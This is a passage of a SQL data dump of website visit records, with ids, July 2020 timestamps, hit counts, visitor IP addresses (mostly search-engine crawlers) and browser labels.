203.16','other'),(523311,1594935573,1,1,0,0,'66.249.64.36','chrome'),(523312,1594936309,3,3,0,0,'66.249.70.72','chrome'),(523313,1594936375,5,5,0,0,'66.249.70.69','chrome'),(523314,1594936532,1,1,0,0,'178.154.200.92','other'),(523315,1594936542,1,1,0,0,'66.249.70.70','chrome'),(523316,1594936940,1,1,0,0,'66.249.64.33','chrome'),(523317,1594937348,2,2,0,0,'66.249.70.72','chrome'),(523318,1594937568,3,3,0,0,'66.249.70.70','chrome'),(523319,1594937611,1,1,0,0,'157.55.39.137','other'),(523320,1594937919,2,2,0,0,'66.249.64.33','chrome'),(523321,1594938195,4,4,0,0,'66.249.70.69','chrome'),(523322,1594938305,1,1,0,0,'178.154.200.236','other'),(523323,1594938599,4,4,0,0,'66.249.70.70','chrome'),(523324,1594938878,2,2,0,0,'66.249.70.72','chrome'),(523325,1594938981,2,2,0,0,'66.249.64.36','chrome'),(523326,1594939332,2,2,0,0,'66.249.70.69','chrome'),(523327,1594939494,2,2,0,0,'178.154.200.222','other'),(523328,1594940268,2,2,0,0,'66.249.70.69','chrome'),(523329,1594940518,1,1,0,0,'178.154.200.220','other'),(523330,1594940540,5,5,0,0,'66.249.70.70','chrome'),(523331,1594940836,4,4,0,0,'66.249.70.72','chrome'),(523332,1594941211,2,2,0,0,'66.249.70.69','chrome'),(523333,1594941224,2,2,0,0,'66.249.64.36','chrome'),(523334,1594941960,1,1,0,0,'66.249.70.70','chrome'),(523335,1594942157,1,1,0,0,'66.249.64.33','chrome'),(523336,1594942254,8,8,0,0,'66.249.70.69','chrome'),(523337,1594942344,1,1,0,0,'66.249.64.36','chrome'),(523338,1594942506,1,1,0,0,'188.122.82.146','chrome'),(523339,1594942653,1,1,0,0,'66.249.70.72','chrome'),(523340,1594943708,1,1,0,0,'62.205.134.182','other'),(523341,1594943710,4,4,0,0,'66.249.70.72','chrome'),(523342,1594943720,1,1,0,0,'66.249.70.70','chrome'),(523343,1594943796,2,2,0,0,'66.249.70.69','chrome'),(523344,1594943816,1,1,0,0,'66.249.64.38','chrome'),(523345,1594943819,1,1,0,0,'66.249.64.36','chrome'),(523346,1594944678,1,1,0,0,'66.249.70.72','chrome'),(523347,1594945005,3,3,0,0,'66.249.70.69','chrome'),(523348,1594945463,3,3,0,0,'66.249.70.70','chrome'),(523349,1594945482,1,1,0,0,'66.249.64.38','chrome'),(523350,1594945599,1,1,0,0,'66.249.64.33','chrome'),(523351,1594945863,1,1,0,0,'178.154.200.220','other'),(523352,1594946155,1,1,0,0,'66.249.70.72','chrome'),(523353,1594946161,1,1,0,0,'8.29.198.25','other'),(523354,1594946260,1,1,0,0,'8.29.198.27','other'),(523355,1594946430,1,1,0,0,'178.154.200.196','other'),(523356,1594946691,1,1,0,0,'66.249.70.70','chrome'),(523357,1594946777,2,2,0,0,'66.249.70.69','chrome'),(523358,1594947177,1,1,0,0,'66.249.64.33','chrome'),(523359,1594947224,4,4,0,0,'66.249.70.72','chrome'),(523360,1594947593,2,2,0,0,'66.249.70.70','chrome'),(523361,1594947624,8,8,0,0,'185.11.82.228','other'),(523362,1594948805,1,1,0,0,'157.55.39.137','other'),(523363,1594948917,8,8,0,0,'185.11.82.228','other'),(523364,1594949489,1,1,0,0,'66.249.64.38','chrome'),(523365,1594949614,1,1,0,0,'194.61.24.94','other'),(523366,1594949683,3,3,0,0,'66.249.70.72','chrome'),(523367,1594949695,1,1,0,0,'66.249.64.33','chrome'),(523368,1594949791,3,3,0,0,'66.249.70.70','chrome'),(523369,1594949819,2,2,0,0,'66.249.64.36','chrome'),(523370,1594949924,4,4,0,0,'66.249.70.69','chrome'),(523371,1594950139,1,1,0,0,'34.222.188.241','chrome'),(523372,1594950197,8,8,0,0,'185.11.82.228','other'),(523373,1594951062,2,2,0,0,'66.249.70.70','chrome'),(523374,1594951314,1,1,0,0,'66.249.70.69','chrome'),(523375,1594951466,8,8,0,0,'185.11.82.228','other'),(523376,1594951486,1,1,0,0,'207.46.13.20','other'),(523377,1594952049,3,3,0,0,'66.249.70.72','chrome'),(523378,1594952267,1,1,0,0,'66.249.64.33','chrome'),(523379,1594952710,8,8,0,0,'185.11.82.228','other'),(523380,1594952760,1,1,0,0,'66.249.70.69','chrome'),(523381,1594952965,1,1,0,0,'66.249.64.38','chrome'),(523382,1594953969,8,8,0,0,'185.11.82.228','other'),(523383,1594954042,3,3,0,0,'66.249.64.38','chrome'),(523384,1594954178,5,5,0,0,'66.249.70.72','chrome'),(523385,1594954197,6,6,0,0,'66.249.70.69','chrome'),(523386,1594954224,1,1,0,0,'66.249.64.33','chrome'),(523387,1594954473,1,1,0,0,'66.249.64.36','chrome'),(523388,1594954920,1,1,0,0,'66.249.70.70','chrome'),(523389,1594955149,1,1,0,0,'66.249.70.69','chrome'),(523390,1594955242,2,2,0,0,'66.249.64.33','chrome'),(523391,1594955263,8,8,0,0,'185.11.82.228','other'),(523392,1594955681,1,1,0,0,'66.249.64.38','chrome'),(523393,1594955769,1,1,0,0,'178.154.200.222','other'),(523394,1594955957,3,3,0,0,'66.249.70.72','chrome'),(523395,1594956058,1,1,0,0,'66.249.70.69','chrome'),(523396,1594956136,1,1,0,0,'178.154.200.155','other'),(523397,1594956287,2,2,0,0,'66.249.70.70','chrome'),(523398,1594956509,1,1,0,0,'62.149.15.172','chrome'),(523399,1594956575,8,8,0,0,'185.11.82.228','other'),(523400,1594956771,1,1,0,0,'178.154.200.191','other'),(523401,1594956990,1,1,0,0,'8.29.198.26','other'),(523402,1594957083,1,1,0,0,'66.249.70.69','chrome'),(523403,1594957084,1,1,0,0,'8.29.198.27','other'),(523404,1594957216,1,1,0,0,'66.249.64.33','chrome'),(523405,1594957278,1,1,0,0,'66.249.70.70','chrome'),(523406,1594957317,1,1,0,0,'66.249.64.38','chrome'),(523407,1594957801,1,1,0,0,'213.180.203.16','other'),(523408,1594957908,8,8,0,0,'185.11.82.228','other'),(523409,1594959086,1,1,0,0,'178.154.200.155','other'),(523410,1594959246,8,8,0,0,'185.11.82.228','other'),(523411,1594959329,1,1,0,0,'66.249.70.70','chrome'),(523412,1594959458,1,1,0,0,'66.249.70.69','chrome'),(523413,1594959585,1,1,0,0,'213.180.203.16','other'),(523414,1594959620,1,1,0,0,'66.249.64.38','chrome'),(523415,1594959923,1,1,0,0,'178.154.200.222','other'),(523416,1594960187,1,1,0,0,'131.220.6.152','chrome'),(523417,1594960377,1,1,0,0,'66.249.70.70','chrome'),(523418,1594960619,8,8,0,0,'185.11.82.228','other'),(523419,1594960681,1,1,0,0,'66.249.64.33','chrome'),(523420,1594961586,1,1,0,0,'62.205.134.182','other'),(523421,1594961862,1,1,0,0,'66.249.64.33','chrome'),(523422,1594961873,2,2,0,0,'66.249.70.69','chrome'),(523423,1594961959,6,6,0,0,'66.249.70.70','chrome'),(523424,1594961962,8,8,0,0,'185.11.82.228','other'),(523425,1594961996,1,1,0,0,'5.45.207.162','other'),(523426,1594962464,1,1,0,0,'66.249.64.38','chrome'),(523427,1594962880,7,7,0,0,'66.249.70.70','chrome'),(523428,1594963155,4,4,0,0,'66.249.70.72','chrome'),(523429,1594963252,8,8,0,0,'185.11.82.228','other'),(523430,1594963365,7,7,0,0,'66.249.70.69','chrome'),(523431,1594963516,1,1,0,0,'178.154.200.97','other'),(523432,1594963529,1,1,0,0,'178.154.200.220','other'),(523433,1594963804,5,5,0,0,'66.249.70.70','chrome'),(523434,1594963956,1,1,0,0,'178.154.200.222','other'),(523435,1594964310,2,2,0,0,'66.249.70.69','chrome'),(523436,1594964663,8,8,0,0,'185.11.82.228','other'),(523437,1594964757,1,1,0,0,'212.1.124.210','chrome'),(523438,1594964858,4,4,0,0,'66.249.70.70','chrome'),(523439,1594965323,5,5,0,0,'66.249.70.69','chrome'),(523440,1594965460,1,1,0,0,'66.249.64.38','chrome'),(523441,1594965465,1,1,0,0,'66.249.64.36','chrome'),(523442,1594965471,1,1,0,0,'5.181.233.162','chrome'),(523443,1594965509,1,1,0,0,'178.154.200.222','other'),(523444,1594965553,5,5,0,0,'66.249.70.72','chrome'),(523445,1594965906,2,2,0,0,'66.249.70.70','chrome'),(523446,1594966107,8,8,0,0,'185.11.82.228','other'),(523447,1594966240,1,1,0,0,'66.249.70.69','chrome'),(523448,1594966244,1,1,0,0,'66.249.64.33','chrome'),(523449,1594966552,1,1,0,0,'178.93.96.161','chrome'),(523450,1594967152,1,1,0,0,'178.154.200.196','other'),(523451,1594967297,2,2,0,0,'66.249.64.36','chrome'),(523452,1594967340,5,5,0,0,'66.249.70.72','chrome'),(523453,1594967425,1,0,1,0,'66.249.70.69',''),(523454,1594967596,1,1,0,0,'66.249.64.33','chrome'),(523455,1594967611,4,4,0,0,'66.249.70.70','chrome'),(523456,1594967634,8,8,0,0,'185.11.82.228','other'),(523457,1594967689,4,4,0,0,'66.249.70.69','chrome'),(523458,1594967810,1,1,0,0,'8.29.198.27','other'),(523459,1594967906,1,1,0,0,'8.29.198.25','other'),(523460,1594969127,3,3,0,0,'66.249.70.70','chrome'),(523461,1594969193,8,8,0,0,'185.11.82.228','other'),(523462,1594969228,2,2,0,0,'66.249.64.33','chrome'),(523463,1594969282,4,4,0,0,'66.249.70.72','chrome'),(523464,1594969290,6,6,0,0,'66.249.70.69','chrome'),(523465,1594969321,3,3,0,0,'66.249.64.36','chrome'),(523466,1594969659,1,1,0,0,'66.249.64.38','chrome'),(523467,1594969766,1,1,0,0,'91.196.178.74','chrome'),(523468,1594970137,2,2,0,0,'66.249.70.70','chrome'),(523469,1594970574,1,1,0,0,'178.95.156.86','chrome'),(523470,1594970657,1,1,0,0,'66.249.64.33','chrome'),(523471,1594970719,2,2,0,0,'66.249.64.36','chrome'),(523472,1594970745,1,1,0,0,'91.196.178.67','firefox'),(523473,1594970837,2,2,0,0,'66.249.64.38','chrome'),(523474,1594970848,3,3,0,0,'66.249.70.72','chrome'),(523475,1594970867,8,8,0,0,'185.11.82.228','other'),(523476,1594970880,2,2,0,0,'178.154.200.222','other'),(523477,1594971135,2,2,0,0,'66.249.70.69','chrome'),(523478,1594971143,4,4,0,0,'66.249.70.70','chrome'),(523479,1594971371,1,1,0,0,'181.215.191.110','chrome'),(523480,1594971805,1,1,0,0,'207.46.13.102','other'),(523481,1594972351,1,1,0,0,'91.196.177.46','chrome'),(523482,1594972352,1,1,0,0,'91.196.178.89','chrome'),(523483,1594972560,8,8,0,0,'185.11.82.228','other'),(523484,1594972681,5,5,0,0,'66.249.70.69','chrome'),(523485,1594972848,3,3,0,0,'66.249.70.70','chrome'),(523486,1594973097,1,1,0,0,'66.249.70.72','chrome'),(523487,1594973559,1,1,0,0,'31.129.177.119','chrome'),(523488,1594973586,1,1,0,0,'66.249.64.33','chrome'),(523489,1594973816,1,1,0,0,'31.13.127.120','other'),(523490,1594974154,2,2,0,0,'66.249.70.72','chrome'),(523491,1594974245,1,1,0,0,'141.98.102.172','msie'),(523492,1594974248,8,8,0,0,'185.11.82.228','other'),(523493,1594974293,1,1,0,0,'66.249.70.70','chrome'),(523494,1594974559,1,1,0,0,'176.122.104.182','chrome'),(523495,1594974597,2,2,0,0,'66.249.70.69','chrome'),(523496,1594975110,1,1,0,0,'66.249.70.72','chrome'),(523497,1594975296,1,1,0,0,'66.249.64.38','chrome'),(523498,1594975953,8,8,0,0,'185.11.82.228','other'),(523499,1594976135,1,1,0,0,'66.249.64.33','chrome'),(523500,1594976298,2,2,0,0,'66.249.64.36','chrome'),(523501,1594976473,2,2,0,0,'66.249.70.69','chrome'),(523502,1594976570,2,2,0,0,'66.249.70.70','chrome'),(523503,1594977036,1,1,0,0,'66.249.64.33','chrome'),(523504,1594977832,1,1,0,0,'52.14.91.49','chrome'),(523505,1594978268,3,3,0,0,'66.249.70.69','chrome'),(523506,1594978631,2,2,0,0,'8.29.198.26','other'),(523507,1594978672,1,1,0,0,'66.249.64.33','chrome'),(523508,1594978862,1,1,0,0,'66.249.70.72','chrome'),(523509,1594978945,2,2,0,0,'157.55.39.137','other'),(523510,1594979425,1,1,0,0,'128.124.112.223','chrome'),(523511,1594979903,1,1,0,0,'66.249.70.69','chrome'),(523512,1594979946,1,1,0,0,'66.249.64.36','chrome'),(523513,1594980529,1,1,0,0,'66.249.70.70','chrome'),(523514,1594981042,1,1,0,0,'66.249.64.38','chrome'),(523515,1594981061,8,8,0,0,'185.11.82.228','other'),(523516,1594981071,1,1,0,0,'66.249.64.33','chrome'),(523517,1594981201,2,2,0,0,'207.46.13.20','other'),(523518,1594982087,2,2,0,0,'66.249.70.70','chrome'),(523519,1594982267,2,2,0,0,'66.249.70.72','chrome'),(523520,1594982654,8,8,0,0,'185.11.82.228','other'),(523521,1594983439,4,4,0,0,'66.249.70.70','chrome'),(523522,1594983804,1,1,0,0,'66.249.70.72','chrome'),(523523,1594984275,8,8,0,0,'185.11.82.228','other'),(523524,1594984515,2,2,0,0,'66.249.70.69','chrome'),(523525,1594984835,1,1,0,0,'109.74.154.72','chrome'),(523526,1594985280,1,1,0,0,'91.196.178.89','chrome'),(523527,1594985463,1,1,0,0,'66.249.70.72','chrome'),(523528,1594985834,8,8,0,0,'185.11.82.228','other'),(523529,1594985882,1,1,0,0,'66.249.70.70','chrome'),(523530,1594985980,1,1,0,0,'66.249.64.33','chrome'),(523531,1594986850,1,1,0,0,'207.46.13.102','other'),(523532,1594987114,1,1,0,0,'91.196.178.89','chrome'),(523533,1594987137,2,2,0,0,'66.249.70.72','chrome'),(523534,1594987411,8,8,0,0,'185.11.82.228','other'),(523535,1594988578,1,1,0,0,'157.55.39.137','other'),(523536,1594988592,1,1,0,0,'91.196.178.89','chrome'),(523537,1594988713,1,1,0,0,'91.196.178.74','chrome'),(523538,1594988823,1,1,0,0,'66.249.70.72','chrome'),(523539,1594988881,3,3,0,0,'66.249.70.70','chrome'),(523540,1594989063,8,8,0,0,'185.11.82.228','other'),(523541,1594989134,1,1,0,0,'66.249.70.69','chrome'),(523542,1594989278,1,1,0,0,'66.249.64.38','chrome'),(523543,1594989449,2,2,0,0,'8.29.198.25','other'),(523544,1594989794,3,3,0,0,'66.249.70.70','chrome'),(523545,1594990794,8,8,0,0,'185.11.82.228','other'),(523546,1594990913,1,1,0,0,'66.249.70.69','chrome'),(523547,1594991057,1,1,0,0,'66.249.70.72','chrome'),(523548,1594991137,1,1,0,0,'79.137.130.220','chrome'),(523549,1594991861,1,1,0,0,'141.98.102.172','msie'),(523550,1594992079,1,1,0,0,'212.1.124.210','chrome'),(523551,1594992347,1,1,0,0,'66.249.70.70','chrome'),(523552,1594992450,8,8,0,0,'185.11.82.228','other'),(523553,1594992471,1,1,0,0,'66.249.70.69','chrome'),(523554,1594992704,1,1,0,0,'157.55.39.137','other'),(523555,1594993825,1,1,0,0,'207.46.13.102','other'),(523556,1594993889,1,1,0,0,'66.249.64.33','chrome'),(523557,1594994142,8,8,0,0,'185.11.82.228','other'),(523558,1594994841,1,1,0,0,'66.249.70.69','chrome'),(523559,1594994960,1,1,0,0,'88.155.106.85','chrome'),(523560,1594995995,8,8,0,0,'185.11.82.228','other'),(523561,1594996104,1,1,0,0,'66.249.70.69','chrome'),(523562,1594996923,1,1,0,0,'66.249.70.72','chrome'),(523563,1594997028,1,1,0,0,'209.17.97.18','other'),(523564,1594997474,1,1,0,0,'157.55.39.137','other'),(523565,1594997692,3,3,0,0,'176.9.8.180','chrome'),(523566,1594997941,8,8,0,0,'185.11.82.228','other'),(523567,1594998089,1,1,0,0,'66.249.64.36','chrome'),(523568,1594999615,2,2,0,0,'66.249.70.72','chrome'),(523569,1594999736,1,1,0,0,'66.249.70.70','chrome'),(523570,1594999851,8,8,0,0,'185.11.82.228','other'),(523571,1595000269,2,2,0,0,'8.29.198.25','other'),(523572,1595001356,2,2,0,0,'66.249.64.36','chrome'),(523573,1595001531,2,2,0,0,'66.249.70.69','chrome'),(523574,1595001810,1,1,0,0,'95.163.36.15','other'),(523575,1595001865,8,8,0,0,'185.11.82.228','other'),(523576,1595002113,2,2,0,0,'66.249.70.72','chrome'),(523577,1595002537,4,4,0,0,'66.249.70.70','chrome'),(523578,1595002875,3,3,0,0,'66.249.70.69','chrome'),(523579,1595003022,4,4,0,0,'66.249.70.72','chrome'),(523580,1595003718,1,1,0,0,'66.249.70.70','chrome'),(523581,1595003861,8,8,0,0,'185.11.82.228','other'),(523582,1595003974,3,3,0,0,'66.249.70.72','chrome'),(523583,1595004382,1,1,0,0,'66.249.64.38','chrome'),(523584,1595004922,4,4,0,0,'66.249.70.69','chrome'),(523585,1595005485,1,1,0,0,'66.249.70.70','chrome'),(523586,1595006550,1,1,0,0,'66.249.64.36','chrome'),(523587,1595007007,1,1,0,0,'141.98.102.172','msie'),(523588,1595007214,2,2,0,0,'66.249.70.72','chrome'),(523589,1595007306,8,8,0,0,'185.11.82.228','other'),(523590,1595007513,1,1,0,0,'77.74.177.114','chrome'),(523591,1595008143,3,3,0,0,'66.249.64.38','chrome'),(523592,1595008294,1,1,0,0,'66.249.70.72','chrome'),(523593,1595008492,3,3,0,0,'66.249.70.69','chrome'),(523594,1595008683,3,3,0,0,'66.249.70.70','chrome'),(523595,1595008993,1,1,0,0,'66.249.64.36','chrome'),(523596,1595009766,6,6,0,0,'66.249.70.70','chrome'),(523597,1595010176,8,8,0,0,'185.11.82.228','other'),(523598,1595010322,1,1,0,0,'66.249.70.69','chrome'),(523599,1595010617,1,1,0,0,'66.249.70.72','chrome'),(523600,1595010839,1,1,0,0,'66.249.64.36','chrome'),(523601,1595011089,1,1,0,0,'8.29.198.26','other'),(523602,1595011130,1,1,0,0,'66.249.70.70','chrome'),(523603,1595011216,1,1,0,0,'8.29.198.27','other'),(523604,1595011825,2,2,0,0,'66.249.70.72','chrome'),(523605,1595012000,3,3,0,0,'66.249.64.36','chrome'),(523606,1595012043,2,2,0,0,'66.249.70.70','chrome'),(523607,1595012684,2,2,0,0,'66.249.70.69','chrome'),(523608,1595012909,1,1,0,0,'66.249.70.72','chrome'),(523609,1595012948,1,1,0,0,'66.249.64.38','chrome'),(523610,1595012956,1,1,0,0,'66.249.70.70','chrome'),(523611,1595013268,8,8,0,0,'185.11.82.228','other'),(523612,1595013713,3,3,0,0,'66.249.70.69','chrome'),(523613,1595013821,1,1,0,0,'195.162.70.236','chrome'),(523614,1595013962,2,2,0,0,'66.249.64.38','chrome'),(523615,1595014075,2,2,0,0,'66.249.70.70','chrome'),(523616,1595014329,2,2,0,0,'66.249.70.72','chrome'),(523617,1595014673,2,2,0,0,'66.249.64.33','chrome'),(523618,1595014949,3,3,0,0,'66.249.70.69','chrome'),(523619,1595015279,1,1,0,0,'66.249.64.36','chrome'),(523620,1595015384,1,1,0,0,'66.249.70.70','chrome'),(523621,1595015531,2,2,0,0,'157.55.39.137','other'),(523622,1595016223,3,3,0,0,'66.249.70.69','chrome'),(523623,1595016301,2,2,0,0,'66.249.70.72','chrome'),(523624,1595016340,4,4,0,0,'66.249.70.70','chrome'),(523625,1595016379,1,1,0,0,'66.249.64.33','chrome'),(523626,1595016391,1,1,0,0,'37.73.222.14','chrome'),(523627,1595017245,2,2,0,0,'66.249.64.38','chrome'),(523628,1595017800,1,1,0,0,'66.249.70.69','chrome'),(523629,1595017944,1,1,0,0,'66.249.64.33','chrome'),(523630,1595018047,8,8,0,0,'185.11.82.228','other'),(523631,1595018166,3,3,0,0,'66.249.70.72','chrome'),(523632,1595018493,2,2,0,0,'66.249.64.36','chrome'),(523633,1595019436,3,3,0,0,'66.249.70.72','chrome'),(523634,1595019440,3,3,0,0,'66.249.70.70','chrome'),(523635,1595019506,1,1,0,0,'66.249.64.36','chrome'),(523636,1595019514,2,2,0,0,'66.249.70.69','chrome'),(523637,1595019634,1,1,0,0,'66.249.64.33','chrome'),(523638,1595020864,8,8,0,0,'185.11.82.228','other'),(523639,1595021262,1,1,0,0,'66.249.70.72','chrome'),(523640,1595021456,1,1,0,0,'66.249.64.38','chrome'),(523641,1595021741,1,1,0,0,'157.55.39.186','other'),(523642,1595021968,1,1,0,0,'66.249.70.69','chrome'),(523643,1595022198,2,2,0,0,'66.249.70.70','chrome'),(523644,1595022759,2,2,0,0,'8.29.198.27','other'),(523645,1595023099,1,1,0,0,'66.249.64.38','chrome'),(523646,1595023734,8,8,0,0,'185.11.82.228','other'),(523647,1595023826,1,1,0,0,'66.249.70.70','chrome'),(523648,1595024509,1,1,0,0,'194.61.24.94','other'),(523649,1595024843,1,1,0,0,'66.249.70.70','chrome'),(523650,1595025329,2,2,0,0,'66.249.70.69','chrome'),(523651,1595025343,1,1,0,0,'154.51.131.142','chrome'),(523652,1595026522,1,1,0,0,'157.55.39.186','other'),(523653,1595026918,1,1,0,0,'66.249.70.69','chrome'),(523654,1595027144,1,1,0,0,'66.249.70.70','chrome'),(523655,1595027257,8,8,0,0,'185.11.82.228','other'),(523656,1595027504,1,1,0,0,'13.66.139.0','other'),(523657,1595028309,1,1,0,0,'66.249.70.69','chrome'),(523658,1595029019,1,1,0,0,'157.55.39.186','other'),(523659,1595029770,2,2,0,0,'66.249.70.70','chrome'),(523660,1595030108,1,1,0,0,'62.205.134.182','other'),(523661,1595030873,1,1,0,0,'66.249.70.70','chrome'),(523662,1595031009,1,1,0,0,'66.249.64.36','chrome'),(523663,1595031019,8,8,0,0,'185.11.82.228','other'),(523664,1595031123,1,1,0,0,'178.71.10.87','chrome'),(523665,1595031848,2,2,0,0,'66.249.70.70','chrome'),(523666,1595033597,1,1,0,0,'66.249.70.72','chrome'),(523667,1595033651,1,1,0,0,'66.249.64.36','chrome'),(523668,1595033709,2,2,0,0,'66.249.70.69','chrome'),(523669,1595033753,2,2,0,0,'8.29.198.25','other'),(523670,1595035170,8,8,0,0,'185.11.82.228','other'),(523671,1595036067,1,1,0,0,'66.249.70.69','chrome'),(523672,1595037058,1,1,0,0,'66.249.64.33','chrome'),(523673,1595037132,1,1,0,0,'66.249.64.38','chrome'),(523674,1595037225,2,2,0,0,'66.249.70.72','chrome'),(523675,1595037388,1,1,0,0,'66.249.70.69','chrome'),(523676,1595037749,1,1,0,0,'188.191.233.57','chrome'),(523677,1595038250,1,1,0,0,'66.249.70.70','chrome'),(523678,1595038317,2,2,0,0,'66.249.64.38','chrome'),(523679,1595038456,1,1,0,0,'66.249.64.36','chrome'),(523680,1595038626,1,1,0,0,'66.249.70.69','chrome'),(523681,1595039402,8,8,0,0,'185.11.82.228','other'),(523682,1595039591,2,2,0,0,'66.249.70.70','chrome'),(523683,1595039860,1,1,0,0,'207.46.13.14','other'),(523684,1595040300,1,1,0,0,'157.55.39.186','other'),(523685,1595040302,1,1,0,0,'66.249.70.72','chrome'),(523686,1595040390,2,1,1,0,'66.249.70.69',''),(523687,1595041351,2,2,0,0,'66.249.70.72','chrome'),(523688,1595041448,1,1,0,0,'66.249.70.70','chrome'),(523689,1595041498,1,1,0,0,'66.249.70.69','chrome'),(523690,1595042092,2,2,0,0,'178.154.200.222','other'),(523691,1595042574,2,2,0,0,'66.249.70.69','chrome'),(523692,1595042590,2,2,0,0,'66.249.70.70','chrome'),(523693,1595043114,2,2,0,0,'66.249.70.72','chrome'),(523694,1595044082,5,5,0,0,'66.249.70.69','chrome'),(523695,1595044211,8,8,0,0,'185.11.82.228','other'),(523696,1595044574,2,2,0,0,'8.29.198.25','other'),(523697,1595044917,6,6,0,0,'66.249.70.72','chrome'),(523698,1595044929,3,3,0,0,'66.249.70.70','chrome'),(523699,1595046079,2,2,0,0,'66.249.70.72','chrome'),(523700,1595046230,2,2,0,0,'66.249.64.38','chrome'),(523701,1595046530,1,1,0,0,'131.220.6.152','chrome'),(523702,1595046581,1,1,0,0,'91.196.178.138','chrome'),(523703,1595046607,3,3,0,0,'178.154.200.222','other'),(523704,1595046644,3,3,0,0,'207.46.13.14','other'),(523705,1595046763,2,2,0,0,'66.249.70.70','chrome'),(523706,1595046770,1,1,0,0,'66.249.64.33','chrome'),(523707,1595046829,1,1,0,0,'66.249.64.36','chrome'),(523708,1595047151,3,3,0,0,'66.249.70.72','chrome'),(523709,1595047912,1,1,0,0,'66.249.70.70','chrome'),(523710,1595047921,1,1,0,0,'62.205.134.182','other'),(523711,1595048382,3,3,0,0,'66.249.70.72','chrome'),(523712,1595048460,1,1,0,0,'66.249.64.33','chrome'),(523713,1595048653,8,8,0,0,'185.11.82.228','other'),(523714,1595048841,1,1,0,0,'66.249.70.70','chrome'),(523715,1595049146,2,2,0,0,'178.133.32.105','chrome'),(523716,1595049521,1,1,0,0,'178.154.200.222','other'),(523717,1595049540,2,2,0,0,'66.249.70.69','chrome'),(523718,1595049917,2,2,0,0,'66.249.64.38','chrome'),(523719,1595049936,5,5,0,0,'66.249.70.72','chrome'),(523720,1595050039,1,1,0,0,'66.249.64.36','chrome'),(523721,1595050231,3,3,0,0,'66.249.70.70','chrome'),(523722,1595050476,1,1,0,0,'66.249.70.69','chrome'),(523723,1595050564,1,1,0,0,'92.38.136.69','chrome'),(523724,1595050666,1,1,0,0,'178.154.200.222','other'),(523725,1595050841,2,2,0,0,'66.249.70.72','chrome'),(523726,1595051109,1,1,0,0,'178.93.148.53','chrome'),(523727,1595051611,3,3,0,0,'66.249.70.69','chrome'),(523728,1595051762,2,2,0,0,'66.249.70.72','chrome'),(523729,1595051824,1,1,0,0,'66.249.64.33','chrome'),(523730,1595052201,2,2,0,0,'66.249.64.38','chrome'),(523731,1595052458,1,1,0,0,'66.249.64.36','chrome'),(523732,1595053378,1,1,0,0,'178.154.200.222','other'),(523733,1595053483,3,3,0,0,'66.249.70.69','chrome'),(523734,1595053562,1,1,0,0,'66.249.70.70','chrome'),(523735,1595053716,1,1,0,0,'66.249.70.72','chrome'),(523736,1595053844,1,1,0,0,'66.249.64.33','chrome'),(523737,1595054255,1,1,0,0,'207.46.13.14','other'),(523738,1595054665,1,1,0,0,'173.82.95.179','firefox'),(523739,1595054994,1,1,0,0,'66.249.70.72','chrome'),(523740,1595055294,7,7,0,0,'66.249.70.69','chrome'),(523741,1595055397,1,1,0,0,'8.29.198.26','other'),(523742,1595055433,1,1,0,0,'8.29.198.27','other'),(523743,1595055503,6,6,0,0,'66.249.70.70','chrome'),(523744,1595055589,8,8,0,0,'185.11.82.228','other'),(523745,1595055647,1,1,0,0,'66.249.64.38','chrome'),(523746,1595056471,1,1,0,0,'66.249.64.36','chrome'),(523747,1595056552,3,3,0,0,'66.249.70.70','chrome'),(523748,1595056583,1,1,0,0,'66.249.64.38','chrome'),(523749,1595056638,2,2,0,0,'66.249.70.69','chrome'),(523750,1595056643,1,1,0,0,'178.154.200.222','other'),(523751,1595056701,1,1,0,0,'157.55.39.186','other'),(523752,1595057438,2,2,0,0,'66.249.70.72','chrome'),(523753,1595057453,1,1,0,0,'66.249.70.70','chrome'),(523754,1595057939,1,1,0,0,'66.249.70.69','chrome'),(523755,1595058734,1,1,0,0,'66.102.9.164','chrome'),(523756,1595058813,8,8,0,0,'66.249.70.70','chrome'),(523757,1595059035,1,1,0,0,'66.249.70.69','chrome'),(523758,1595059114,1,1,0,0,'178.154.200.222','other'),(523759,1595059155,1,1,0,0,'66.249.64.36','chrome'),(523760,1595059171,1,1,0,0,'66.249.70.72','chrome'),(523761,1595059629,1,1,0,0,'89.163.242.241','opera'),(523762,1595059808,1,1,0,0,'66.249.64.38','chrome'),(523763,1595060173,1,1,0,0,'66.249.70.72','chrome'),(523764,1595060251,1,1,0,0,'66.249.64.36','chrome'),(523765,1595060915,2,2,0,0,'66.249.64.33','chrome'),(523766,1595060985,2,2,0,0,'66.249.70.70','chrome'),(523767,1595061066,1,1,0,0,'66.249.70.69','chrome'),(523768,1595061156,2,2,0,0,'66.249.70.72','chrome'),(523769,1595061312,1,1,0,0,'66.249.64.36','chrome'),(523770,1595061896,8,8,0,0,'185.11.82.228','other'),(523771,1595062667,3,3,0,0,'66.249.70.70','chrome'),(523772,1595062881,2,2,0,0,'66.249.70.69','chrome'),(523773,1595063464,1,1,0,0,'66.249.64.33','chrome'),(523774,1595063934,3,3,0,0,'66.249.70.69','chrome'),(523775,1595064205,2,2,0,0,'66.249.70.72','chrome'),(523776,1595064629,1,1,0,0,'66.249.64.36','chrome'),(523777,1595064652,3,3,0,0,'66.249.70.70','chrome'),(523778,1595064948,1,1,0,0,'66.249.64.38','chrome'),(523779,1595066249,5,5,0,0,'66.249.70.70','chrome'),(523780,1595066252,1,1,0,0,'8.29.198.27','other'),(523781,1595066270,1,1,0,0,'8.29.198.26','other'),(523782,1595066298,1,1,0,0,'91.209.11.236','other'),(523783,1595066486,3,3,0,0,'66.249.70.69','chrome'),(523784,1595066987,1,1,0,0,'128.124.213.105','chrome'),(523785,1595067131,1,1,0,0,'66.249.70.72','chrome'),(523786,1595067157,1,1,0,0,'128.124.213.105','other'),(523787,1595067416,2,2,0,0,'66.249.70.69','chrome'),(523788,1595068385,1,1,0,0,'207.46.13.14','other'),(523789,1595069641,1,1,0,0,'39.101.129.127','other'),(523790,1595070037,2,2,0,0,'66.249.70.69','chrome'),(523791,1595070135,1,1,0,0,'178.154.200.222','other'),(523792,1595070433,1,1,0,0,'66.249.64.36','chrome'),(523793,1595070801,8,8,0,0,'185.11.82.228','other'),(523794,1595071086,1,1,0,0,'66.249.70.69','chrome'),(523795,1595071553,1,1,0,0,'109.74.154.72','chrome'),(523796,1595071704,3,3,0,0,'66.249.70.72','chrome'),(523797,1595072123,1,1,0,0,'66.249.70.69','chrome'),(523798,1595072251,1,1,0,0,'66.249.70.70','chrome'),(523799,1595072399,1,1,0,0,'66.249.64.36','chrome'),(523800,1595072418,1,1,0,0,'66.249.64.33','chrome'),(523801,1595073292,1,1,0,0,'66.249.70.72','chrome'),(523802,1595073658,1,1,0,0,'66.249.70.70','chrome'),(523803,1595074023,1,